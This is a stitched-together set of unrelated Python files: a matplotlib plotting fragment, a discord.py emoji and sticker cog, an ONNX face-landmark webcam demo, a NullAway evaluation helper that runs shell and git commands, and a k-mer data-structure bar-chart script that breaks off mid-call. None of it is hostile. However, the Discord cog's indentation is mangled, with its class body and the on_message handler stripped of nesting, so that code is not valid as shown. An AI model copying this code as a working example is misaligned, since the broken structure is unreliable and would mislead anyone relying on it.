                    tick_label=year_labels, align='center',
                    color=fill_color, edgecolor=border_color)
    if percentage_markers:
        # Hoisted out of the inner loop: the renderer is the same for
        # every text label on this figure.
        renderer = f.canvas.get_renderer()
        for j in range(len(rects)):
            rect = rects[j]
            percent_string = "{:.0f}%".format(100.0 * percentages[i][j])
            # Place at (0, 0) first; the final position depends on the
            # rendered text size, measured below.
            t = ax.text(0, 0, percent_string,
                        verticalalignment='center', weight='bold',
                        clip_on=True)
            bb = t.get_window_extent(renderer=renderer)
            bb_coords = bb.transformed(ax.transData.inverted())
            if rect.get_width() > bb_coords.width + 0.025:
                # Label fits inside the bar: center it, draw in white.
                x = rect.get_x() + rect.get_width() / 2.0
                clr = 'white'
                align = 'center'
            else:
                # Label too wide: place it just right of the bar, in black.
                x = rect.get_x() + rect.get_width() + 0.025
                clr = 'black'
                align = 'left'
            y = rect.get_y() + rect.get_height() / 2.0
            t.set_color(clr)
            # Use the public Text setters instead of poking the private
            # attributes (t._x / t._y / t._horizontalalignment), which
            # bypassed matplotlib's API and could break between releases.
            t.set_x(x)
            t.set_y(y)
            t.set_horizontalalignment(align)
# Final figure styling: hide tick marks, spines, and redundant labels,
# then save (or preview) the figure.
# tick_params visibility arguments take booleans; the string 'off' was a
# deprecated spelling (and is truthy, so it can silently invert the intent
# on modern matplotlib).
axs[0].tick_params(
    axis='y',
    which='both',
    right=False)
f.subplots_adjust(wspace=0)
setp([a.get_xticklabels() for a in f.axes], visible=False)
for ax in axs:
    ax.spines['right'].set_visible(False)
    ax.spines['top'].set_visible(False)
    ax.spines['bottom'].set_visible(False)
    ax.tick_params(
        axis='x',
        which='both',
        top=False,
        bottom=False)
    ax.spines['left'].set_visible(False)
# Drop y tick marks (and labels) on all but the first column when
# show_y_ticks is enabled; on every column otherwise.
for ax in axs[1 if show_y_ticks else 0:]:
    ax.tick_params(
        axis='y',
        which='both',
        left=False,
        right=False,
        labelbottom=False)  # NOTE(review): on a y-axis call this was likely meant to be labelleft — confirm
if preview_only:
    show()
else:
    savefig(filename)
|
"""
Copyright 2021 Nirlep_5252_
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import discord
from discord.ext import commands
from typing import Union, Optional
from utils.embed import error_embed, success_embed
from config import EMOJIS, MAIN_COLOR, SUPPORT_SERVER_LINK
from utils.bot import EpicBot
from utils.ui import Confirm, Paginator, PaginatorText
from utils.converters import Lower
from utils.flags import StickerFlags
from io import BytesIO
class emojis(commands.Cog, description="Emoji related commands!"):
def __init__(self, client: EpicBot):
    # Keep a reference to the bot instance so commands can reach its
    # caches (client.emojis, client.stickers) later.
    self.client = client
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Enlarge an emoji.")
async def enlarge(self, ctx, emoji: Union[discord.Emoji, discord.PartialEmoji, str] = None):
    """Reply with the full-size image URL of a custom emoji."""
    if emoji is None:
        # No argument given: refund the cooldown and show usage help.
        ctx.command.reset_cooldown(ctx)
        usage = error_embed(
            f"{EMOJIS['tick_no']} Invalid Usage!",
            f"Please enter an emoji to enlarge.\nCorrect Usage: `{ctx.clean_prefix}enlarge <emoji>`"
        )
        return await ctx.reply(embed=usage)
    if isinstance(emoji, str):
        # The converter fell through to a plain string, i.e. no real
        # custom emoji matched the input.
        raise commands.EmojiNotFound(emoji)
    await ctx.reply(emoji.url)
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Search for emojis!", aliases=['searchemoji', 'findemoji', 'emojifind'])
async def emojisearch(self, ctx: commands.Context, name: Lower = None):
    """Paginate every usable bot-visible emoji whose name contains *name*."""
    if not name:
        ctx.command.reset_cooldown(ctx)
        return await ctx.reply(f"Please enter a query!\n\nExample: `{ctx.clean_prefix}emojisearch cat`")
    # Collect usable emojis whose (lowercased) name contains the query.
    matches = []
    for emo in self.client.emojis:
        if name in emo.name.lower() and emo.is_usable():
            matches.append(str(emo))
    if not matches:
        ctx.command.reset_cooldown(ctx)
        return await ctx.reply(f"Couldn't find any results for `{name}`, please try again.")
    # Chunk the results into pages of at most 500 characters.
    pages = commands.Paginator(prefix="", suffix="", max_size=500)
    for entry in matches:
        pages.add_line(entry)
    await ctx.reply(f"Found `{len(matches)}` emojis.")
    if len(pages.pages) == 1:
        return await ctx.send(pages.pages[0])
    view = PaginatorText(ctx, pages.pages)
    await ctx.send(pages.pages[0], view=view)
@commands.cooldown(2, 10, commands.BucketType.user)
@commands.command(help="Search for stickers!", aliases=['searchsticker', 'findsticker', 'stickerfind'])
async def stickersearch(self, ctx: commands.Context, name: Lower = None):
    """Show an embed page for every bot-visible sticker whose name contains *name*."""
    if not name:
        ctx.command.reset_cooldown(ctx)
        return await ctx.reply(f"Please enter a query!\n\nExample: `{ctx.clean_prefix}stickersearch cat`")
    found = [s for s in self.client.stickers if name in s.name.lower()]
    if not found:
        ctx.command.reset_cooldown(ctx)
        return await ctx.reply(f"Couldn't find any results for `{name}`, please try again.")
    # One embed per matching sticker, with the sticker image attached.
    embeds = []
    for sticker in found:
        page = discord.Embed(
            title=sticker.name,
            description=sticker.description,
            color=MAIN_COLOR,
            url=sticker.url
        )
        page.set_image(url=sticker.url)
        embeds.append(page)
    await ctx.reply(f"Found `{len(embeds)}` stickers.")
    if len(embeds) == 1:
        return await ctx.send(embed=embeds[0])
    view = Paginator(ctx, embeds)
    return await ctx.send(embed=embeds[0], view=view)
    @commands.command(help="Clone emojis!", aliases=['clone-emoji', 'cloneemoji'])
    @commands.has_permissions(manage_emojis=True)
    @commands.bot_has_permissions(manage_emojis=True)
    @commands.cooldown(3, 30, commands.BucketType.user)
    async def clone(self, ctx, emojis: commands.Greedy[Union[discord.PartialEmoji, discord.Emoji]] = None):
        """Clone one or more emojis into the current guild.

        PartialEmoji arguments (custom emojis pasted from elsewhere) are
        uploaded directly; anything the converter resolved to a full Emoji is
        shown to the user for confirmation before cloning.  Ends by editing
        the status message with an uploaded/failed summary.
        """
        prefix = ctx.clean_prefix
        if emojis is None:
            return await ctx.reply(embed=error_embed(
                f"{EMOJIS['tick_no']} Invalid Usage!",
                f"Please enter some emojis to clone.\n\n**Example:** {prefix}clone {EMOJIS['heawt']} {EMOJIS['shy_uwu']} ..."
            ))
        uploaded_emojis = ""  # space-separated rendered emojis successfully cloned
        failed_emojis = ""    # space-separated `name` markers for failed uploads
        m = await ctx.reply(f"Cloning please wait... {EMOJIS['loading']}")
        for emoji in emojis:
            if isinstance(emoji, discord.PartialEmoji):
                # Pasted custom emoji: clone without asking.
                try:
                    emo = await ctx.guild.create_custom_emoji(
                        name=emoji.name,
                        image=await emoji.read(),
                        reason=f"Clone command used by {ctx.author} ({ctx.author.id})"
                    )
                    uploaded_emojis += f"{emo} "
                except Exception:
                    # Best-effort: record the failure (e.g. emoji slots full) and move on.
                    failed_emojis += f"`{emoji.name}` "
            else:
                # Resolved full Emoji: show it and ask the user to confirm first.
                view = Confirm(context=ctx)
                await m.edit(
                    content="",
                    embed=success_embed(
                        "Is this the emoji you wanted?",
                        f"The name `{emoji.name}` corresponds to this emote, do u want to clone this?"
                    ).set_image(url=emoji.url),
                    view=view
                )
                await view.wait()
                if view.value is None:
                    # Confirmation timed out: skip this emoji.
                    await m.edit(
                        content="",
                        embed=error_embed(
                            "You didn't respond in time.",
                            f"Skipped this emoji. Cloning other emojis... {EMOJIS['loading']}"
                        ),
                        view=None
                    )
                elif not view.value:
                    # User declined.
                    await m.edit(
                        content="",
                        embed=success_embed(
                            f"{EMOJIS['tick_yes']} Alright!",
                            "Skipped that emote."
                        ),
                        view=None
                    )
                else:
                    # User confirmed: upload this emoji too.
                    await m.edit(
                        content="",
                        embed=discord.Embed(
                            title=f"{EMOJIS['tick_yes']} Ok, cloning...",
                            color=MAIN_COLOR
                        ),
                        view=None
                    )
                    try:
                        emo = await ctx.guild.create_custom_emoji(
                            name=emoji.name,
                            image=await emoji.read(),
                            reason=f"Clone command used by {ctx.author} ({ctx.author.id})"
                        )
                        uploaded_emojis += f"{emo} "
                    except Exception:
                        failed_emojis += f"`{emoji.name}` "
        # Final summary replaces the status message.
        await m.edit(
            content=f"I have cloned {uploaded_emojis}{' and failed to clone '+failed_emojis if len(failed_emojis) > 0 else ''}",
            embed=None,
            view=None
        )
    @commands.command(help="Create a sticker in your server!", aliases=['makesticker', 'create_sticker', 'make_sticker', 'create-sticker', 'make-sticker'])
    @commands.cooldown(3, 10, commands.BucketType.user)
    @commands.has_permissions(manage_emojis_and_stickers=True)
    @commands.bot_has_permissions(manage_emojis_and_stickers=True)
    async def createsticker(self, ctx: commands.Context, emoji: Optional[Union[discord.Emoji, discord.PartialEmoji]] = None, *, emoji_flags: Optional[StickerFlags] = None):
        """Create a guild sticker from an emoji or a message attachment.

        The image comes from *emoji* when given, otherwise from the first
        attachment.  Name/description/related-emoji default from the file
        name and the author, unless overridden via *emoji_flags*.
        """
        if emoji is not None:
            # Use the emoji's image bytes as the sticker source.
            file = discord.File(BytesIO(await emoji.read()), filename=f"{emoji.name}.png")
        else:
            if len(ctx.message.attachments) == 0:
                # Nothing to build a sticker from: refund the cooldown.
                ctx.command.reset_cooldown(ctx)
                return await ctx.reply(f"Please mention an emoji/upload a file to make a sticker!\n\nExample: `{ctx.clean_prefix}make-sticker :dance:`")
            else:
                file = await ctx.message.attachments[0].to_file()
        if not emoji_flags:
            # No flags: derive everything from the file name and author.
            name = file.filename.split(".")[0]
            description = f"Uploaded by {ctx.author}"
            emoji = name
        else:
            # NOTE(review): presumably the 1-char fallback exists because
            # Discord rejects very short sticker names — confirm.
            name = emoji_flags.name if len(emoji_flags.name) > 1 else "name"
            description = emoji_flags.description if emoji_flags.description is not None else f"Uploaded by {ctx.author}"
            emoji = emoji_flags.emoji or name
        try:
            sticker = await ctx.guild.create_sticker(
                name=name,
                description=description,
                emoji=emoji,
                file=file,
                reason=f"Command used by {ctx.author}"
            )
            return await ctx.reply(f"{EMOJIS['tick_yes']}Sticker uploaded!", stickers=[sticker])
        except Exception as e:
            # Upload can fail (format/size limits, sticker slots full, ...).
            ctx.command.reset_cooldown(ctx)
            return await ctx.reply(f"Sticker upload failed. Error: `{e}`\n\nIf this was unexpected please report it in our support server {SUPPORT_SERVER_LINK}")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if not message.guild:
return
# checking if nqn is enabled or not
guild_config = await self.client.get_guild_config(message.guild.id)
if not guild_config['nqn']:
return
# checking for blacklisted users
for e in self.client.blacklisted_cache:
if message.author.id == e['_id']:
return
# spliting the message content
pain = message.content.split(" ")
# empty string that i'll fill with cu- i mean the final nqn output text
final_msg = ""
# am iterating thru every single word in the list `pain`
for e in pain:
# spliting the word with ":" for checking if it has emoji or not
hmm = e.split(":")
# if it had emoji it would have 2 `:` in the word which means the lenght of `hmm` would atleast be `3` and if its not 3 then we dont do anything
if len(hmm) < 3:
final_msg += e + " "
# it has 2 or more `:` in the word so it has chances of having `:something:` in it
else:
i = 1
# another empty string that im gonna fill with cu- i mean text!
interesting = ""
for h in range(0, len(hmm)):
ee = hmm[h]
# now over here im checking if the word that im replacing with the emoji is in between the 2 `:`'s
# like when i split "amogus:some_emoji:amogus" i will get ["amogus", "some_emoji", "amogus"]
# so im making sure that i replace "some_emoji" with the actual emoji string
if i % 2 == 0:
# finding the emoji...
emoji = discord.utils.get(self.client.emojis, name=ee)
# here im checking if the actual word contains a nitro emoji or a fake emoji
# by nitro emoji i mean "<:emoji_name:ID>" and by fake emoji i mean ":emoji_name:"
# we only want to replace if it contains a fake emoji and not a real emoji
if emoji is not None and emoji.is_usable() and (hmm[h + 1][18: 19] != ">"):
interesting += str(emoji)
else:
interesting += ":" + ee + (":" if len(hmm) != i else "")
else:
interesting += ee
i += 1
final_msg += interesting + " "
if final_msg not in [message.content, message.content[:-1], message.content + " "]:
msg_attachments = []
for attachment in message.attachments:
uwu = await attachment.to_file()
msg_attachments.append(uwu)
await message.delete()
webhooks = await message.channel.webhooks()
webhook = discord.utils.get(webhooks, name="EpicBot NQN", user=self.client.user)
if webhook is None:
webhook = await message.channel.create_webhook(name="EpicBot NQN")
await webhook.send(
final_msg,
files=msg_attachments,
username=message.author.name,
avatar_url=message.author.display_avatar.url,
allowed_mentions=discord.AllowedMentions.none()
)
def setup(client):
    # discord.py extension entry point: register the emojis cog on the bot.
    client.add_cog(emojis(client))
|
# Face alignment demo
# <NAME> (<EMAIL>)
from __future__ import division
import argparse
import torch
import torch.onnx
import torchvision.transforms as transforms
import os
import cv2
import numpy as np
#import dlib
from common.utils import BBox,drawLandmark,drawLandmark_multiple
from models.basenet import MobileNet_GDConv_56
import matplotlib.pyplot as plt
from MTCNN import detect_faces
from PIL import Image
import time
# CLI options: input image name, loader workers, CUDA devices, model checkpoint.
parser = argparse.ArgumentParser(description='PyTorch face landmark')
# Datasets
parser.add_argument('-img', '--image', default='face76', type=str)
parser.add_argument('-j', '--workers', default=8, type=int, metavar='N',
                    help='number of data loading workers (default: 4)')
parser.add_argument('--gpu_id', default='0,1', type=str,
                    help='id(s) for CUDA_VISIBLE_DEVICES')
parser.add_argument('-c', '--checkpoint', default='checkpoint/mobilenet_56_model_best_gdconv.pth.tar', type=str, metavar='PATH',
                    help='path to save checkpoint (default: checkpoint)')
args = parser.parse_args()
# ImageNet normalization statistics; the 56x56 resize matches the network input.
mean = np.asarray([ 0.485, 0.456, 0.406 ])
std = np.asarray([ 0.229, 0.224, 0.225 ])
resize = transforms.Resize([56, 56])
to_tensor = transforms.ToTensor()
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
                                 std=[0.229, 0.224, 0.225])
# Load checkpoint tensors onto GPU when available, otherwise onto CPU.
if torch.cuda.is_available():
    map_location=lambda storage, loc: storage.cuda()
else:
    map_location='cpu'
def load_model():
    """Build MobileNet_GDConv_56 (136 outputs — presumably 68 (x, y) landmark
    pairs; confirm against the training code) and load weights from the
    --checkpoint path via the global map_location (CPU or GPU)."""
    model = MobileNet_GDConv_56(136)
    checkpoint = torch.load(args.checkpoint, map_location=map_location)
    model.load_state_dict(checkpoint['state_dict'])
    return model
if __name__ == '__main__':
    import onnx
    # Validate the exported ONNX graph before creating an inference session.
    onnx_model = onnx.load("onnx/landmark_detection_56_se_external.onnx")
    onnx.checker.check_model(onnx_model)
    import onnxruntime
    ort_session = onnxruntime.InferenceSession("onnx/landmark_detection_56_se_external.onnx")

    def to_numpy(tensor):
        """Torch tensor -> numpy array, detaching first if it tracks gradients."""
        return tensor.detach().cpu().numpy() if tensor.requires_grad else tensor.cpu().numpy()

    out_size = 56  # network input resolution (56x56)
    cap = cv2.VideoCapture(0)
    success, frame = cap.read()
    while success:
        success, img = cap.read()
        height, width, _ = img.shape
        # MTCNN face detection expects RGB PIL images.
        img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        image = Image.fromarray(img)
        faces, landmarks = detect_faces(image)
        if len(faces) == 0:
            print('NO face is detected!')
            continue
        for k, face in enumerate(faces):
            x1 = face[0]
            y1 = face[1]
            x2 = face[2]
            y2 = face[3]
            # Expand the detection box to a square with a 10% margin,
            # centered on the original box.
            w = x2 - x1 + 1
            h = y2 - y1 + 1
            size = int(max([w, h]) * 1.1)
            cx = x1 + w // 2
            cy = y1 + h // 2
            x1 = cx - size // 2
            x2 = x1 + size
            y1 = cy - size // 2
            y2 = y1 + size
            # How far the square box sticks out past each image edge.
            dx = max(0, -x1)
            dy = max(0, -y1)
            x1 = max(0, x1)
            y1 = max(0, y1)
            edx = max(0, x2 - width)
            edy = max(0, y2 - height)
            x2 = min(width, x2)
            y2 = min(height, y2)
            new_bbox = list(map(int, [x1, x2, y1, y2]))
            new_bbox = BBox(new_bbox)
            cropped = img[new_bbox.top:new_bbox.bottom, new_bbox.left:new_bbox.right]
            if (dx > 0 or dy > 0 or edx > 0 or edy > 0):
                # Pad with black where the square box left the frame.
                cropped = cv2.copyMakeBorder(cropped, int(dy), int(edy), int(dx), int(edx), cv2.BORDER_CONSTANT, 0)
            cropped_face = cv2.resize(cropped, (out_size, out_size))
            if cropped_face.shape[0] <= 0 or cropped_face.shape[1] <= 0:
                continue
            cropped_face = cv2.cvtColor(cropped_face, cv2.COLOR_BGR2RGB)
            cropped_face = Image.fromarray(cropped_face)
            test_face = resize(cropped_face)
            test_face = to_tensor(test_face)
            test_face = normalize(test_face)
            test_face.unsqueeze_(0)  # add batch dimension
            start = time.time()
            ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(test_face)}
            ort_outs = ort_session.run(None, ort_inputs)
            end = time.time()
            print('Time: {:.6f}s.'.format(end - start))
            landmark = ort_outs[0]
            # (x, y) pairs in crop space, projected back to image coordinates.
            landmark = landmark.reshape(-1, 2)
            landmark = new_bbox.reprojectLandmark(landmark)
            img = drawLandmark_multiple(img, new_bbox, landmark)
        # Show the fully annotated frame once per frame.
        # FIX: the original called waitKey twice back-to-back (30ms + 10ms of
        # extra latency, with Esc only ever breaking the inner face loop, so
        # Esc never exited the program).  One waitKey now both paces display
        # and polls for Esc, and the break leaves the capture loop.
        cv2.imshow('Face Alignment Demo', img)
        if cv2.waitKey(30) == 27:  # Esc key to stop
            break
    cap.release()
    cv2.destroyAllWindows()
|
<filename>nullaway-eval/common.py
import sys
if sys.version_info[0] < 3:
    raise Exception("Must use Python 3!")
import os.path, subprocess, configparser, logging, time, atexit
# --- User-adjustable file locations ---
repo_prefix = "repos"          # where evaluated repositories are cloned
log_file = "eval.log"          # detailed command-output log
stats_file = "result.csv"      # aggregated results
#--- Do NOT change these ---
repo_list = "eval_repos.txt"   # one repo URL per line
patch_prefix = "patches"       # per-repo patches, one subdirectory per repo
script_file = "script.sh"
arg_prefix = "compile_args"
arg_suffix = ".arg"
# Nullness-analysis configurations the evaluation can run.
processors = ["nullaway","base","checkerframework","eradicate","nullsafe","gradual","dereferences","unannotated"]
# Tool locations come from config.ini; some are exported for the builds.
config = configparser.ConfigParser()
config.read('config.ini')
nullaway_root = os.path.abspath(config.get('PATHS','nullaway'))
if not os.path.isdir(nullaway_root):
    exit("Error: NullAway not found!")
os.environ["ANDROID_HOME"] = config.get('PATHS','android_sdk')
os.environ["CHECKERFRAMEWORK"] = config.get('PATHS','checkerframework')
os.environ["FB_INFER"] = config.get('PATHS','infer')
# File logger: everything at DEBUG and up goes to eval.log with timestamps.
log = logging.getLogger("log")
log.setLevel(logging.DEBUG)
hdlr = logging.FileHandler(log_file)
hdlr.setFormatter(logging.Formatter('%(asctime)s| %(levelname)s: %(message)s'))
log.addHandler(hdlr)
def print_and_log(msg):
    """Echo *msg* to stdout and record it at INFO level in the eval log."""
    log.info(msg)
    print(msg)
def str_from_file(path, default=""):
    """Return the contents of *path* with all newlines stripped, or *default*
    when the file does not exist."""
    if os.path.exists(path):
        # with-block closes the handle; the original leaked it.
        with open(path, 'r') as f:
            return f.read().replace('\n', '')
    return default
def list_from_file(path):
    """Return the non-comment lines of *path*, stopping at the first blank line.

    Lines starting with '#' are skipped; a blank line deliberately terminates
    the read (repo lists end at the first blank line).  Missing files yield
    an empty list.
    """
    ret = []
    if os.path.exists(path):
        # with-block closes the handle; the original leaked it.
        with open(path, 'r') as f:
            for line in f.read().splitlines():
                if not line: break
                if line.startswith('#'): continue
                ret.append(line)
    return ret
# Running error counters: nerr counts failed shell commands since start;
# nerr_before snapshots the count at the previous check_errors() call.
nerr = 0
nerr_before = 0
def check_errors():
    """Overwrite the previous terminal line with a colored verdict: red FAIL
    when new errors were logged since the last call, green PASS otherwise."""
    global nerr_before
    # \033[F moves the cursor up one line; 31/32 select red/green.
    print("\033[F\t\033[1;3"+("1mFAIL" if nerr > nerr_before else "2mPASS")+" \033[0m")
    nerr_before = nerr
def cmd_in_dir(dir, cmd, subdir="", tag="", outlines=20):
    """Run *cmd* through the shell inside dir/subdir and return its last
    *outlines* output lines (None when *cmd* is falsy).

    Failures are logged and counted in the global ``nerr`` rather than raised,
    so a broken repo does not abort the whole evaluation.
    NOTE(review): the command string is passed to a shell (required for the
    "cd ... && ..." chaining) — callers must not feed it untrusted input.
    """
    if not cmd: return
    try:
        output = subprocess.check_output("cd "+dir+"/"+subdir+" && "+cmd,shell=True,stderr=subprocess.STDOUT).decode(encoding='UTF-8')
        log.debug("{}| command '{}' output:\n{}".format(tag,cmd,output))
    except subprocess.CalledProcessError as e:
        # Keep going: record the captured output and bump the error counter.
        output = e.output.decode()
        log.error("{}| command '{}' with return code {}:\n{}".format(tag,e.cmd,e.returncode,output))
        global nerr
        nerr += 1
    return '\n'.join(output.splitlines()[-outlines:])
def is_opt(arg):
    """True when *arg* is a non-empty string beginning with '-' (a CLI flag)."""
    if not arg:
        return False
    return arg.startswith('-')
start_time = time.time()
allWarns = False     # -w/-warn: keep all compiler warnings
daemonBuild = False  # -d/-daemon: allow the Gradle daemon
repos = []           # repo URLs selected for this run
tools = []           # processor names selected for this run
if len(sys.argv) > 1:
    # Flag args select options/tools by prefix; bare args select repos by
    # grepping their name against eval_repos.txt.
    # NOTE(review): "-w"/"-warn" also fall through into the tools branch
    # below (no elif after the first if) — harmless here because no
    # processor name starts with "w" or "warn".
    for arg in sys.argv[1:]:
        if is_opt(arg):
            if arg.lower() in ["-w","-warn"]: allWarns = True
            if arg.lower() in ["-d","-daemon"]: daemonBuild = True
            else: tools.extend(filter(lambda p: p.startswith(arg[1:].lower()), processors))
            sys.argv.remove(arg)
        else:
            # Match the bare name against the repo list to recover its URL.
            url = cmd_in_dir(".","grep "+arg.replace(repo_prefix,'').rstrip('/')+"$ "+repo_list).rstrip()
            if url: repos.append(url)
# Defaults: all repos from the list, all processors.
if len(sys.argv) == 1: repos = list_from_file(repo_list)
if not len(repos): exit("Error: No repos found!")
if not len(tools): tools = processors
def repo_name(repo_url):
    """Last path component of a repo URL (the checkout directory name)."""
    return repo_url.split('/')[-1]
def repo_dir(repo_url): return repo_prefix+"/"+repo_name(repo_url)  # local checkout path under repos/
def cmd_in_repo(repo_url, cmd, subdir=""): return cmd_in_dir(repo_dir(repo_url), cmd, subdir)  # run a shell command inside the repo checkout
def clean_repo(repo_url):
    """Reset an existing checkout to a pristine state: check out the pinned
    commit (or stash local edits), delete untracked files, write the Android
    SDK path into local.properties, and make gradlew executable."""
    if os.path.isdir(repo_dir(repo_url)):
        # Pinned commit recorded under patches/<repo>/hash, if present.
        hash = str_from_file(patch_prefix+"/"+repo_name(repo_url)+"/hash")
        if hash: cmd_in_repo(repo_url,"git checkout -f "+hash)
        else: cmd_in_repo(repo_url,"git stash")
        cmd_in_repo(repo_url,"git clean -fx && echo \"sdk.dir = ${ANDROID_HOME}\" > local.properties && chmod +x ./gradlew || true")
def get_repo(repo_url):
    """Clone *repo_url* under repos/ if not already present, then reset the
    checkout to a clean state."""
    # if os.path.isdir(repo_dir(repo_url)):
    #     os.system("rm -rf "+repo_dir(repo_url))
    if not os.path.isdir(repo_dir(repo_url)):
        print_and_log("@ "+repo_name(repo_url)+": downloading...")
        cmd_in_dir(".", "git clone "+repo_url+" "+repo_dir(repo_url))
    clean_repo(repo_url)
def patch_file(repo_url, patch_type):
    """Absolute path of the patch for *repo_url* and processor index
    *patch_type*, or None when the index is out of range or no patch exists."""
    if patch_type >= len(processors):
        return None
    candidate = patch_prefix + "/" + repo_name(repo_url) + "/" + processors[patch_type]
    if not os.path.exists(candidate):
        return None
    return os.path.abspath(candidate)
def apply_patch(repo_url, patch_type=0):
    """Clean the repo and apply the patch for processor index *patch_type*
    (default 0, i.e. nullaway).  Returns False when no such patch exists."""
    patch = patch_file(repo_url, patch_type)
    if not patch: return False
    print_and_log("@ "+repo_name(repo_url)+": applying patch... "+ patch)
    clean_repo(repo_url)
    cmd_in_repo(repo_url,"git apply "+patch)
    return True
@atexit.register
def exit_fnc():
    """On interpreter exit: point at the log file when errors occurred, then
    print the total elapsed wall time as HH:MM:SS."""
    if nerr: print_and_log(str(nerr)+" errors: Check log! "+os.path.abspath(log_file))
    print_and_log(time.strftime("%H:%M:%S", time.gmtime(time.time()-start_time)))
|
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.patches import Patch
import sys
# Usage: plot.py <tab-separated-results-file> <operation-name>
# Each input line holds one series of throughput numbers (floats).
inputFile=open(sys.argv[1]).readlines()
opType=sys.argv[2]
inputFile=[list(map(float,x.split("\t"))) for x in inputFile ]
def prepare(arr2):
arr=arr2.copy()
bottoms=[]
for l in arr:
bottoms.append([0]*len(l))
for i in range(len(arr[0])):
tmp=sorted(range(len(arr)),key=lambda x:arr[x][i])
for k in range(1,4):
for j in range(k):
arr[tmp[k]][i]-=arr[tmp[j]][i]
bottoms[tmp[k]][i]+=arr[tmp[j]][i]
return (arr,bottoms)
# Stack-prepare each structure's four FPR rows (0.1, 0.01, 0.001, 0.0001),
# five structures in fixed input order: MQF, CQF, buffered MQF, CMS (Khmer),
# plain CMS.
mqf_res = prepare(inputFile[0:4])
cqf_res = prepare(inputFile[4:8])
bmqf_res = prepare(inputFile[8:12])
CountminKhmer_res = prepare(inputFile[12:16])
Countmin_res = prepare(inputFile[16:20])
# SRA accession labels for the x axis, one per benchmark dataset.
distributions = ["ERR1050075", "SRR11551346", "SRR12801265", "SRR12924365", "SRR12937177", "ERR992657", "SRR12873993", "SRR12989394"]
# Grouped stacked bar chart: 5 data structures x 8 datasets; within each bar,
# segments are stacked by false-positive rate (solid = 0.0001, then hatched
# 0.001 / 0.01 / 0.1).  prepare() supplied heights in [0] and bottoms in [1],
# indexed [row] where row 3 = FPR 0.0001 ... row 0 = FPR 0.1.
fig, ax = plt.subplots()
bar_width = 0.35
epsilon = .035      # small gap between adjacent bars in a group
line_width = 1
opacity = 1
# x positions: one cluster per dataset (spaced 2.5 apart), structures offset
# by bar_width within the cluster.
mqf_bar_positions = np.arange(len(mqf_res[0][0]))*2.5
cqf_bar_positions = mqf_bar_positions + bar_width
bmqf_bar_positions = mqf_bar_positions + 2*bar_width
CountminKhmer_bar_positions = mqf_bar_positions + 3*bar_width
Countmin_bar_positions = mqf_bar_positions + 4*bar_width
# One color per data structure.
mqfColor='#d73027'
cqfColor='#fc8d59'
bmqfColor='#fee090'
CountminKhmerColor='#91bfdb'
CountminColor='#4575b4'
# make bar plots
# --- MQF stack ---
mqf_fpr_0_0001_bar = plt.bar(mqf_bar_positions, mqf_res[0][3], bar_width-epsilon,
                  color=mqfColor,
                  edgecolor=mqfColor,
                  linewidth=line_width,
                  bottom=mqf_res[1][3],
                  label='MQF FPR 0.0001')
mqf_fpr_0_001_bar = plt.bar(mqf_bar_positions, mqf_res[0][2], bar_width-epsilon,
                  bottom=mqf_res[1][2],
                  alpha=opacity,
                  color='white',
                  edgecolor=mqfColor,
                  linewidth=line_width,
                  hatch='//',
                  label='MQF FPR 0.001')
mqf_fpr_0_01_bar = plt.bar(mqf_bar_positions, mqf_res[0][1], bar_width-epsilon,
                  bottom=mqf_res[1][1],
                  alpha=opacity,
                  color='white',
                  edgecolor=mqfColor,
                  linewidth=line_width,
                  hatch='0',
                  label='MQF FPR 0.01')
mqf_fpr_0_1_bar = plt.bar(mqf_bar_positions, mqf_res[0][0], bar_width-epsilon,
                  bottom=mqf_res[1][0],
                  alpha=opacity,
                  color='white',
                  edgecolor=mqfColor,
                  linewidth=line_width,
                  hatch='.',
                  label='MQF FPR 0.1')
# --- CQF stack ---
cqf_fpr_0_0001_bar = plt.bar(cqf_bar_positions, cqf_res[0][3], bar_width- epsilon,
                  color=cqfColor,
                  bottom=cqf_res[1][3],
                  linewidth=line_width,
                  edgecolor=cqfColor,
                  ecolor="#0000DD",
                  label='CQF FPR 0.0001')
cqf_fpr_0_001_bar = plt.bar(cqf_bar_positions, cqf_res[0][2], bar_width-epsilon,
                  bottom=cqf_res[1][2],
                  color="white",
                  hatch='//',
                  edgecolor=cqfColor,
                  ecolor="#0000DD",
                  linewidth=line_width,
                  label='CQF FPR 0.001')
cqf_fpr_0_01_bar = plt.bar(cqf_bar_positions, cqf_res[0][1], bar_width-epsilon,
                  bottom=cqf_res[1][1],
                  color="white",
                  hatch='0',
                  edgecolor=cqfColor,
                  linewidth=line_width,
                  label='CQF FPR 0.01')
cqf_fpr_0_1_bar = plt.bar(cqf_bar_positions, cqf_res[0][0], bar_width-epsilon,
                  bottom=cqf_res[1][0],
                  color="white",
                  hatch='.',
                  edgecolor=cqfColor,
                  linewidth=line_width,
                  label='CQF FPR 0.1')
# --- CMS (Khmer) stack ---
CountminKhmer_fpr_0_0001_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][3], bar_width- epsilon,
                  color=CountminKhmerColor,
                  bottom=CountminKhmer_res[1][3],
                  edgecolor=CountminKhmerColor,
                  linewidth=line_width,
                  label='CMS Khmer FPR 0.0001')
CountminKhmer_fpr_0_001_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][2], bar_width-epsilon,
                  bottom=CountminKhmer_res[1][2],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminKhmerColor,
                  linewidth=line_width,
                  hatch='//',
                  label='CMS Khmer FPR 0.001')
CountminKhmer_fpr_0_01_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][1], bar_width-epsilon,
                  bottom=CountminKhmer_res[1][1],
                  alpha=opacity,
                  color='white',
                  edgecolor=CountminKhmerColor,
                  linewidth=line_width,
                  hatch='0',
                  label='CMS Khmer FPR 0.01')
CountminKhmer_fpr_0_1_bar = plt.bar(CountminKhmer_bar_positions, CountminKhmer_res[0][0], bar_width-epsilon,
